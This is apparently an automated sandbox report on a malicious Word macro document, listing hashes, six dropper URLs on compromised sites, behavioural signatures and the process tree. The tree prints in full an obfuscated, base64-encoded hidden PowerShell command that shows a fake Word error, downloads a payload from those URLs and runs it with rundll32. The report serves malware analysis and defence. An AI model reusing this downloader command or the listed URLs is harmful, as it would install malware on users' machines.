Analysis

  • max time kernel
    139s
  • max time network
    137s
  • platform
    windows10_x64
  • resource
    win10v20201028
  • submitted
    22-02-2021 17:32

General

  • Target

    DXXclarationsXprXXtesXPourXvisualiser.doc

  • Size

    84KB

  • MD5

    f39a42c8cf3c23846e1ade115fb3a996

  • SHA1

    05e03f3137daeb4e5d8f668c76bf84ca663af941

  • SHA256

    636aa231e7d46a77ce7e31df533afa4a4fccd70beb5e71a1be8edb7e17dadb7c

  • SHA512

    3d73f2854d426ed079b84117470e32f31d9551cdec02146f980949eb8529ce2f5b8585911d08630c83d4d351e2241d1555dff5ef9f5e8411f1cfc1f29518dc18

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://www.bidwincash.com/wp-admin/8NUY/

exe.dropper

http://psishops.com/wp-admin/MSInfo/

exe.dropper

http://messenger-courier.com/content/Service/

exe.dropper

http://redmanns-way.com/jeff-intervention-txqikkf/Engines/

exe.dropper

http://alrlawsv.com/explain-functions-kuubxdu/4LAy/

exe.dropper

http://arefhasan.com/wp-admin/z/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 7 IoCs
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 7 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\DXXclarationsXprXXtesXPourXvisualiser.doc" /o ""
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    PID:584
  • C:\Windows\system32\cmd.exe
    cmd cmd cmd cmd /c msg %username% /v Word experienced an error trying to open the file. & P^Ow^er^she^L^L -w hidden -ENCOD IABTAFYAIAAgACgAJwAzAFYAJwArACcAUQAnACkAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsAMwB9AHsANgB9AHsAMAB9AHsANAB9AHsAMgB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBlACcALAAnAFkAJwAsACcAbwAuAGQAaQByAGUAQwBUACcALAAnAHMAeQAnACwAJwBtAC4ASQAnACwAJwBPAHIAJwAsACcAcwBUACcAKQApACAAOwAgACQATwAwAGsAaQAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA3AH0AewAxAH0AewA1AH0AewAyAH0AewAzAH0AewA2AH0AewA4AH0AewAwAH0AewA0AH0AIgAgAC0ARgAnAGEAJwAsACcAbQAuAE4AJwAsACcAcwBFAHIAJwAsACcAVgBJAGMAJwAsACcARwBlAHIAJwAsACcAZQBUAC4AJwAsACcARQBQACcALAAnAFMAWQBTAHQARQAnACwAJwBvAGkATgB0AE0AYQBOACcAKQAgACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQBsAGUAJwArACcAbgB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AJwApACsAJwB0ACcAKwAoACcAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQAQwB6ADIAdwB1AHMAbAA9ACQAQgBfADYASQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVwAyADAATwA7ACQASgA2ADgAUQA9ACgAKAAnAFgAMwAnACsAJwA4ACcAKQArACcASQAnACkAOwAgACAAKAAgAEcAZQBUAC0ASQBUAGUAbQAgACgAIgBWAGEAIgArACIAUgBpAEEAYgBMAEUAOgAiACsAIgAzACIAKwAiAHYAUQAiACkAIAApAC4AdgBhAEwAVQBlADoAOgAiAGMAcgBlAGAAQQB0AEUAZABJAFIARQBjAGAAVABgAG8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwACcAKwAnAH0AUgAnACsAKAAnADEAMQAnACsAJwBwADcAcwAnACkAKwAnADkAewAwAH0ATwAnACsAJwBlAHcAaAA4AG0AdwB7ACcAKwAnADAAfQAnACkALQBGACAAIABbAEMASABhAHIAXQA5ADIAKQApADsAJABQADkANwBOAD0AKAAnAEUAMAAnACsAJwBfAFMAJwApADsAIAAoAGkAdABlAG0AIAAgACgAJwBWAGEAJwArACcAcgBpAGEAQgAnACsAJwBsAEUAOgBvADAAawAnACsAJwBJACcAKQApAC4AdgBBAGwAdQBFADoAOgAiAFMAZQBgAEMAdQBSAEkAVAB5AHAAYABSAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQAQwA5ADEARwA9ACgAJwBPAF8AJwArACcAXwBUACcAKQA7ACQAQQAyAGQAbwBlAGwAZwAgAD0AIAAoACcAUAAnACsAKAAnADAAJwArACcAMABBACcAKQApADsAJABMADQAMABFAD0AKAAoACcAWQAnACsAJwAzADEAJwApACsAJwBYACcAKQA7ACQASwB2AGIAXwBwAGwAaAA9ACQASABPAE0ARQArACgAKAAnAHAAJwArACgAJwBXAHgAJwArACcAUgAnACkAKwAnADEAMQAnACsAKAAnAHAANwBzACcAKwAnADkAcABXACcAKwAnAHgATwBlACcAKQArACgAJwB3AGgAOABtAHcAJwArACcAcABXACcAKQArACcAeAAnACkAIAAtAGMAUgBlAHAATABhAGMAZQAgACAAKABbAEMASABhAHIAXQAxADEAMgArAFsAQwBIAGEAcgBdADgANwArAFsAQwBIAGEAcgBdADEAMgAwACkALABbAEMASABhAHIAXQA5ADIAKQArACQAQQAyAGQAbwBlAGwAZwArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEgANAAxAE0APQAoACgAJwBaADIAJwArACcAMwAnACkAKwAnAFAAJwApADsAJABWAGoAcgB0AGMAegBqAD0AKAAoACcAXQAnACsAJwBiADIAJwApACsAJwBbACcAKwAoACcAcwAnACsAJwA6AC8AJwApACsAJwAvAHcAJwArACgAJwB3AHcALgBiAGkAZAAnACsAJwB3AGkAbgAnACsAJwBjAGEAJwArACcAcwBoAC4AYwAnACsAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAnAGEAJwArACgAJwBkAG0AJwArACcAaQBuACcAKQArACgAJwAvADgAJwArACcATgBVAFkALwAnACkAKwAoACcAQAAnACsAJwBdAGIAMgBbACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAcAAnACsAKAAnAHMAJwArACcAaQBzACcAKQArACgAJwBoACcAKwAnAG8AcAAnACsAJwBzAC4AYwBvAG0AJwArACcALwB3AHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AaQBuACcAKQArACgAJwAvAE0AUwBJACcAKwAnAG4AJwApACsAKAAnAGYAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAcwAnACkAKwAnADoALwAnACsAKAAnAC8AJwArACcAbQBlACcAKQArACgAJwBzAHMAZQAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAGUAcgAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAdQByACcAKQArACgAJwBpAGUAJwArACcAcgAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvACcAKwAnAGMAbwAnACkAKwAoACcAbgAnACsAJwB0ACcAKwAnAGUAbgB0AC8AUwBlACcAKQArACgAJwByAHYAJwArACcAaQBjACcAKQArACcAZQAvACcAKwAoACcAQABdAGIAJwArACcAMgAnACkAKwAoACcAWwBzADoALwAnACsAJwAvAHIAZQAnACkAKwAoACcAZABtAGEAbgAnACsAJwBuAHMAJwArACcALQB3AGEAJwApACsAKAAnAHkALgBjAG8AJwArACcAbQAvACcAKwAnAGoAZQAnACkAKwAnAGYAJwArACcAZgAtACcAKwAoACcAaQBuAHQAZQAnACsAJwByAHYAZQBuACcAKQArACcAdAAnACsAJwBpACcAKwAoACcAbwBuAC0AdAAnACsAJwB4ACcAKQArACgAJwBxACcAKwAnAGkAawBrAGYALwAnACkAKwAnAEUAbgAnACsAKAAnAGcAaQBuAGUAcwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGEAbAAnACsAKAAnAHIAbABhAHcAJwArACcAcwB2AC4AYwBvACcAKwAnAG0AJwArACcALwBlACcAKQArACgAJwB4AHAAbAAnACsAJwBhAGkAJwArACcAbgAnACkAKwAoACcALQBmAHUAbgBjAHQAaQBvACcAKwAnAG4AJwArACcAcwAtAGsAdQB1ACcAKwAnAGIAJwApACsAKAAnAHgAJwArACcAZAB1AC8ANAAnACkAKwAnAEwAQQAnACsAJwB5AC8AJwArACgAJwBAAF0AJwArACcAYgAnACkAKwAoACcAMgAnACsAJwBbAHMAJwArACcAOgAvAC8AJwApACsAJwBhACcAKwAnAHIAZQAnACsAKAAnAGYAaAAnACsAJwBhACcAKQArACgAJwBzAGEAbgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAbQBpACcAKwAnAG4ALwB6ACcAKwAnAC8AJwApACkALgAiAHIAYABFAGAAcABsAEEAQwBlACIAKAAoACcAXQAnACsAKAAnAGIAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAEwASQBUACIAKAAkAE8ANQA1AEMAIAArACAAJABDAHoAMgB3AHUAcwBsACAAKwAgACQAWQAzAF8ATgApADsAJABVAF8ANwBKAD0AKAAnAFgAJwArACgAJwBfADkAJwArACcAQQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgAyADYAcgBnAG8AaQAgAGkAbgAgACQAVgBqAHIAdABjAHoAagApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AHMAdABlAG0ALgBuAGUAVAAuAHcAZQBCAEMATABpAEUAbgBUACkALgAiAEQATwB3AG4AbABPAGAAQQBgAGQAZgBJAGAATABlACIAKAAkAEYAMgA2AHIAZwBvAGkALAAgACQASwB2AGIAXwBwAGwAaAApADsAJABYADkAMgBKAD0AKAAnAEYAJwArACgAJwBfACcAKwAnADYASQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABLAHYAYgBfAHAAbABoACkALgAiAEwAZQBOAEcAYABUAGgAIgAgAC0AZwBlACAANAA2ADQANgA2ACkAIAB7ACYAKAAnAHIAJwArACcAdQAnACsAJwBuAGQAbABsADMAMgAnACkAIAAkAEsAdgBiAF8AcABsAGgALAAoACgAJwBDAG8AbgB0AHIAJwArACcAbwAnACkAKwAoACcAbABfAFIAdQAnACsAJwBuAEQAJwApACsAJwBMACcAKwAnAEwAJwApAC4AIgB0AE8AYABzAHQAUgBJAE4ARwAiACgAKQA7ACQAUQAzADQAUAA9ACgAJwBXADkAJwArACcAOQBVACcAKQA7AGIAcgBlAGEAawA7ACQARgA2ADkAQwA9ACgAKAAnAFQAOAAnACsAJwAyACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMgA3AFcAPQAoACcARgAxACcAKwAnADAARQAnACkA
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:3876
    • C:\Windows\system32\msg.exe
      msg Admin /v Word experienced an error trying to open the file.
      2⤵
        PID:1592
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        POwersheLL -w hidden -ENCOD IABTAFYAIAAgACgAJwAzAFYAJwArACcAUQAnACkAIAAoACAAWwB0AHkAcABlAF0AKAAiAHsAMwB9AHsANgB9AHsAMAB9AHsANAB9AHsAMgB9AHsANQB9AHsAMQB9ACIALQBGACAAJwBlACcALAAnAFkAJwAsACcAbwAuAGQAaQByAGUAQwBUACcALAAnAHMAeQAnACwAJwBtAC4ASQAnACwAJwBPAHIAJwAsACcAcwBUACcAKQApACAAOwAgACQATwAwAGsAaQAgAD0AIABbAFQAWQBQAEUAXQAoACIAewA3AH0AewAxAH0AewA1AH0AewAyAH0AewAzAH0AewA2AH0AewA4AH0AewAwAH0AewA0AH0AIgAgAC0ARgAnAGEAJwAsACcAbQAuAE4AJwAsACcAcwBFAHIAJwAsACcAVgBJAGMAJwAsACcARwBlAHIAJwAsACcAZQBUAC4AJwAsACcARQBQACcALAAnAFMAWQBTAHQARQAnACwAJwBvAGkATgB0AE0AYQBOACcAKQAgACAAOwAkAEUAcgByAG8AcgBBAGMAdABpAG8AbgBQAHIAZQBmAGUAcgBlAG4AYwBlACAAPQAgACgAKAAnAFMAaQBsAGUAJwArACcAbgB0ACcAKQArACgAJwBsACcAKwAnAHkAQwBvAG4AJwApACsAJwB0ACcAKwAoACcAaQBuACcAKwAnAHUAJwApACsAJwBlACcAKQA7ACQAQwB6ADIAdwB1AHMAbAA9ACQAQgBfADYASQAgACsAIABbAGMAaABhAHIAXQAoADYANAApACAAKwAgACQAVwAyADAATwA7ACQASgA2ADgAUQA9ACgAKAAnAFgAMwAnACsAJwA4ACcAKQArACcASQAnACkAOwAgACAAKAAgAEcAZQBUAC0ASQBUAGUAbQAgACgAIgBWAGEAIgArACIAUgBpAEEAYgBMAEUAOgAiACsAIgAzACIAKwAiAHYAUQAiACkAIAApAC4AdgBhAEwAVQBlADoAOgAiAGMAcgBlAGAAQQB0AEUAZABJAFIARQBjAGAAVABgAG8AcgBZACIAKAAkAEgATwBNAEUAIAArACAAKAAoACcAewAwACcAKwAnAH0AUgAnACsAKAAnADEAMQAnACsAJwBwADcAcwAnACkAKwAnADkAewAwAH0ATwAnACsAJwBlAHcAaAA4AG0AdwB7ACcAKwAnADAAfQAnACkALQBGACAAIABbAEMASABhAHIAXQA5ADIAKQApADsAJABQADkANwBOAD0AKAAnAEUAMAAnACsAJwBfAFMAJwApADsAIAAoAGkAdABlAG0AIAAgACgAJwBWAGEAJwArACcAcgBpAGEAQgAnACsAJwBsAEUAOgBvADAAawAnACsAJwBJACcAKQApAC4AdgBBAGwAdQBFADoAOgAiAFMAZQBgAEMAdQBSAEkAVAB5AHAAYABSAE8AYABUAE8AYABjAG8ATAAiACAAPQAgACgAKAAnAFQAbAAnACsAJwBzADEAJwApACsAJwAyACcAKQA7ACQAQwA5ADEARwA9ACgAJwBPAF8AJwArACcAXwBUACcAKQA7ACQAQQAyAGQAbwBlAGwAZwAgAD0AIAAoACcAUAAnACsAKAAnADAAJwArACcAMABBACcAKQApADsAJABMADQAMABFAD0AKAAoACcAWQAnACsAJwAzADEAJwApACsAJwBYACcAKQA7ACQASwB2AGIAXwBwAGwAaAA9ACQASABPAE0ARQArACgAKAAnAHAAJwArACgAJwBXAHgAJwArACcAUgAnACkAKwAnADEAMQAnACsAKAAnAHAANwBzACcAKwAnADkAcABXACcAKwAnAHgATwBlACcAKQArACgAJwB3AGgAOABtAHcAJwArACcAcABXACcAKQArACcAeAAnACkAIAAtAGMAUgBlAHAATABhAGMAZQAgACAAKABbAEMASABhAHIAXQAxADEAMgArAFsAQwBIAGEAcgBdADgANwArAFsAQwBIAGEAcgBdADEAMgAwACkALABbAEMASABhAHIAXQA5ADIAKQArACQAQQAyAGQAbwBlAGwAZwArACgAJwAuACcAKwAoACcAZABsACcAKwAnAGwAJwApACkAOwAkAEgANAAxAE0APQAoACgAJwBaADIAJwArACcAMwAnACkAKwAnAFAAJwApADsAJABWAGoAcgB0AGMAegBqAD0AKAAoACcAXQAnACsAJwBiADIAJwApACsAJwBbACcAKwAoACcAcwAnACsAJwA6AC8AJwApACsAJwAvAHcAJwArACgAJwB3AHcALgBiAGkAZAAnACsAJwB3AGkAbgAnACsAJwBjAGEAJwArACcAcwBoAC4AYwAnACsAJwBvAG0ALwB3ACcAKwAnAHAAJwApACsAJwAtACcAKwAnAGEAJwArACgAJwBkAG0AJwArACcAaQBuACcAKQArACgAJwAvADgAJwArACcATgBVAFkALwAnACkAKwAoACcAQAAnACsAJwBdAGIAMgBbACcAKwAnAHMAJwApACsAKAAnADoAJwArACcALwAvACcAKQArACcAcAAnACsAKAAnAHMAJwArACcAaQBzACcAKQArACgAJwBoACcAKwAnAG8AcAAnACsAJwBzAC4AYwBvAG0AJwArACcALwB3AHAALQAnACkAKwAoACcAYQAnACsAJwBkAG0AaQBuACcAKQArACgAJwAvAE0AUwBJACcAKwAnAG4AJwApACsAKAAnAGYAbwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAyACcAKwAnAFsAcwAnACkAKwAnADoALwAnACsAKAAnAC8AJwArACcAbQBlACcAKQArACgAJwBzAHMAZQAnACsAJwBuACcAKQArACgAJwBnACcAKwAnAGUAcgAtACcAKQArACcAYwAnACsAKAAnAG8AJwArACcAdQByACcAKQArACgAJwBpAGUAJwArACcAcgAuACcAKQArACcAYwAnACsAKAAnAG8AbQAvACcAKwAnAGMAbwAnACkAKwAoACcAbgAnACsAJwB0ACcAKwAnAGUAbgB0AC8AUwBlACcAKQArACgAJwByAHYAJwArACcAaQBjACcAKQArACcAZQAvACcAKwAoACcAQABdAGIAJwArACcAMgAnACkAKwAoACcAWwBzADoALwAnACsAJwAvAHIAZQAnACkAKwAoACcAZABtAGEAbgAnACsAJwBuAHMAJwArACcALQB3AGEAJwApACsAKAAnAHkALgBjAG8AJwArACcAbQAvACcAKwAnAGoAZQAnACkAKwAnAGYAJwArACcAZgAtACcAKwAoACcAaQBuAHQAZQAnACsAJwByAHYAZQBuACcAKQArACcAdAAnACsAJwBpACcAKwAoACcAbwBuAC0AdAAnACsAJwB4ACcAKQArACgAJwBxACcAKwAnAGkAawBrAGYALwAnACkAKwAnAEUAbgAnACsAKAAnAGcAaQBuAGUAcwAnACsAJwAvAEAAJwApACsAKAAnAF0AYgAnACsAJwAyACcAKwAnAFsAcwA6ACcAKQArACcALwAvACcAKwAnAGEAbAAnACsAKAAnAHIAbABhAHcAJwArACcAcwB2AC4AYwBvACcAKwAnAG0AJwArACcALwBlACcAKQArACgAJwB4AHAAbAAnACsAJwBhAGkAJwArACcAbgAnACkAKwAoACcALQBmAHUAbgBjAHQAaQBvACcAKwAnAG4AJwArACcAcwAtAGsAdQB1ACcAKwAnAGIAJwApACsAKAAnAHgAJwArACcAZAB1AC8ANAAnACkAKwAnAEwAQQAnACsAJwB5AC8AJwArACgAJwBAAF0AJwArACcAYgAnACkAKwAoACcAMgAnACsAJwBbAHMAJwArACcAOgAvAC8AJwApACsAJwBhACcAKwAnAHIAZQAnACsAKAAnAGYAaAAnACsAJwBhACcAKQArACgAJwBzAGEAbgAuACcAKwAnAGMAJwApACsAKAAnAG8AbQAnACsAJwAvAHcAcAAnACkAKwAnAC0AJwArACgAJwBhAGQAbQBpACcAKwAnAG4ALwB6ACcAKwAnAC8AJwApACkALgAiAHIAYABFAGAAcABsAEEAQwBlACIAKAAoACcAXQAnACsAKAAnAGIAMgBbACcAKwAnAHMAJwApACkALAAoAFsAYQByAHIAYQB5AF0AKAAnAHMAZAAnACwAJwBzAHcAJwApACwAKAAnAGgAdAAnACsAJwB0AHAAJwApACwAJwAzAGQAJwApAFsAMQBdACkALgAiAFMAYABQAEwASQBUACIAKAAkAE8ANQA1AEMAIAArACAAJABDAHoAMgB3AHUAcwBsACAAKwAgACQAWQAzAF8ATgApADsAJABVAF8ANwBKAD0AKAAnAFgAJwArACgAJwBfADkAJwArACcAQQAnACkAKQA7AGYAbwByAGUAYQBjAGgAIAAoACQARgAyADYAcgBnAG8AaQAgAGkAbgAgACQAVgBqAHIAdABjAHoAagApAHsAdAByAHkAewAoAC4AKAAnAE4AZQAnACsAJwB3AC0ATwBiAGoAJwArACcAZQBjAHQAJwApACAAUwB5AHMAdABlAG0ALgBuAGUAVAAuAHcAZQBCAEMATABpAEUAbgBUACkALgAiAEQATwB3AG4AbABPAGAAQQBgAGQAZgBJAGAATABlACIAKAAkAEYAMgA2AHIAZwBvAGkALAAgACQASwB2AGIAXwBwAGwAaAApADsAJABYADkAMgBKAD0AKAAnAEYAJwArACgAJwBfACcAKwAnADYASQAnACkAKQA7AEkAZgAgACgAKAAuACgAJwBHACcAKwAnAGUAdAAtACcAKwAnAEkAdABlAG0AJwApACAAJABLAHYAYgBfAHAAbABoACkALgAiAEwAZQBOAEcAYABUAGgAIgAgAC0AZwBlACAANAA2ADQANgA2ACkAIAB7ACYAKAAnAHIAJwArACcAdQAnACsAJwBuAGQAbABsADMAMgAnACkAIAAkAEsAdgBiAF8AcABsAGgALAAoACgAJwBDAG8AbgB0AHIAJwArACcAbwAnACkAKwAoACcAbABfAFIAdQAnACsAJwBuAEQAJwApACsAJwBMACcAKwAnAEwAJwApAC4AIgB0AE8AYABzAHQAUgBJAE4ARwAiACgAKQA7ACQAUQAzADQAUAA9ACgAJwBXADkAJwArACcAOQBVACcAKQA7AGIAcgBlAGEAawA7ACQARgA2ADkAQwA9ACgAKAAnAFQAOAAnACsAJwAyACcAKQArACcATgAnACkAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAEoAMgA3AFcAPQAoACcARgAxACcAKwAnADAARQAnACkA
        2⤵
        • Blocklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1304

    Network

    MITRE ATT&CK Matrix ATT&CK v6

    Discovery

    Query Registry

    2
    T1012

    System Information Discovery

    2
    T1082

    Replay Monitor

    Loading Replay Monitor...

    Downloads

    • memory/584-2-0x00007FF9DD1F0000-0x00007FF9DD200000-memory.dmp
      Filesize

      64KB

    • memory/584-3-0x00007FF9DD1F0000-0x00007FF9DD200000-memory.dmp
      Filesize

      64KB

    • memory/584-4-0x00007FF9DD1F0000-0x00007FF9DD200000-memory.dmp
      Filesize

      64KB

    • memory/584-5-0x00007FF9DD1F0000-0x00007FF9DD200000-memory.dmp
      Filesize

      64KB

    • memory/584-6-0x00007FF9FCAF0000-0x00007FF9FD127000-memory.dmp
      Filesize

      6.2MB

    • memory/1304-8-0x0000000000000000-mapping.dmp
    • memory/1304-9-0x00007FF9F5D50000-0x00007FF9F673C000-memory.dmp
      Filesize

      9.9MB

    • memory/1304-10-0x0000026336FB0000-0x0000026336FB1000-memory.dmp
      Filesize

      4KB

    • memory/1304-11-0x0000026337160000-0x0000026337161000-memory.dmp
      Filesize

      4KB

    • memory/1304-12-0x000002631E9A0000-0x000002631E9A2000-memory.dmp
      Filesize

      8KB

    • memory/1304-13-0x000002631E9A3000-0x000002631E9A5000-memory.dmp
      Filesize

      8KB

    • memory/1304-14-0x000002631E9A6000-0x000002631E9A8000-memory.dmp
      Filesize

      8KB

    • memory/1592-7-0x0000000000000000-mapping.dmp